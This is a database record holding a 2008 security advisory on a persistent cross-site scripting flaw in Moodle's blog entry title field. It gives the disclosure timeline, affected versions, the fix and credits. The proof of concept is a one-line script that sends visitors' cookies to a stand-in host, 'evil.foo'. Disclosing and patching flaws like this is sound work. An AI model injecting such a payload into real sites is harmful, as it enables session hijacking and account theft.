{"id": "PACKETSTORM:68451", "type": "packetstorm", "bulletinFamily": "exploit", "title": "ProCheckUp Security Advisory 2008.13", "description": "", "published": "2008-07-23T00:00:00", "modified": "2008-07-23T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/68451/ProCheckUp-Security-Advisory-2008.13.html", "reporter": "ProCheckUp", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:28:15", "viewCount": 10, "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.0}, "sourceHref": "https://packetstormsecurity.com/files/download/68451/PR08-13.txt", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nPR08-13: Persistent Cross-site Scripting (XSS) on Moodle via blog entry \ntitle \n \nVulnerability found: 20/06/2008 \n \nVendor informed: 25/06/2008 \n \nVulnerability fixed: 16/07/2008 \n \nAdvisory publicly released: 22/07/2008 \n \nSeverity: High \n \nDescription: \n \nBy creating a new blog entry ('/blog/edit.php') with a malicious entry \ntitle ('etitle' parameter), it is possible to inject unrestricted \nJavaScript and HTML *persistently* into the application. The malicious \ncode would be returned (and executed) on the main blog section of the \nsite ('/blog/') which can be viewed by any type of account (i.e.: guest, \nstudent, teacher, administrator, etc). \n \n \nNotes: \n \n- - Prerequisite for successful exploitation is blogs being enabled and \nattacker's account having capabilities to add new entries. \n \n- - Moodle reveals its version within HTML source code. i.e.: <a \ntitle=\"moodle 1.6.5 + (2006050550)\" href=\"http://moodle.org/\"> \n \nProof of concept: \n \nExample of malicious code to be injected as a new blog entry title. Such \ncode forwards the cookies of any users who access the blog section of \nthe site to a third-party website: \n \n<script>location='http://evil.foo/x.php?'+document.cookie</script> \n \nThe proof of concept was tested on the following environment: \n \nServer: Apache/2.2.2 (Unix) PHP/5.2.1 mod_ssl/2.2.2 OpenSSL/0.9.7l \nMoodle 1.6.5 + (2006050550) \n \nConsequences: \n \nIt is possible to hijack any account (including privileged ones) by \nstealing the victim's session ID (stored in cookies), or inject a spoof \nHTML login form for phishing purposes. Other attacks are also possible. \n \nVersions affected as confirmed by the vendor: \n \n1.7.3, 1.7.4, 1.6.5, 1.7.2, 1.7.1, 1.7, 1.6.6, 1.6.4, 1.6.3, 1.6.2, \n1.6.1, 1.6 \n \nFix: \n \nUpgrade to 1.6.7, 1.7.5 or any recent nightly or use patch \nhttp://cvs.moodle.org/moodle/blog/lib.php?r1=1.38.6.3&r2=1.38.6.2 \n \nThis issue has been tracked as MDL-15392. \n \n \nReferences: \n \nhttp://moodle.org/mod/forum/discuss.php?d=101401 \nhttp://www.procheckup.com/Vulnerabilities.php \n \nCredits: Adrian Pastor and Amir Azam of ProCheckUp Ltd. (www.procheckup.com) \n \nProCheckUp would like to thank Petr Skoda and the rest of the Moodle \nteam for their excellent response time and cooperation towards resolving \nthis matter. \n \nLegal: \n \nCopyright 2008 Procheckup Ltd. All rights reserved. \n \nPermission is granted for copying and circulating this Bulletin to the \nInternet community for the purpose of alerting them to problems, if and \nonly if, the Bulletin is not edited or changed in any way, is attributed \nto Procheckup, and provided such reproduction and/or distribution is \nperformed for non-commercial purposes. \n \nAny other use of this information is prohibited. Procheckup is not \nliable for any misuse of this information by any third party. \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.6 (GNU/Linux) \n \niD8DBQFIhgDPoR/Hvsj3i8sRApqFAJ448lzgmoz6wsIwndxlKp6Aho0XdACfb/8N \nDWov7Q8NG1otTxbxtL2R4U8= \n=Zfxc \n-----END PGP SIGNATURE----- \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645378301}}
ProCheckUp Security Advisory 2008.13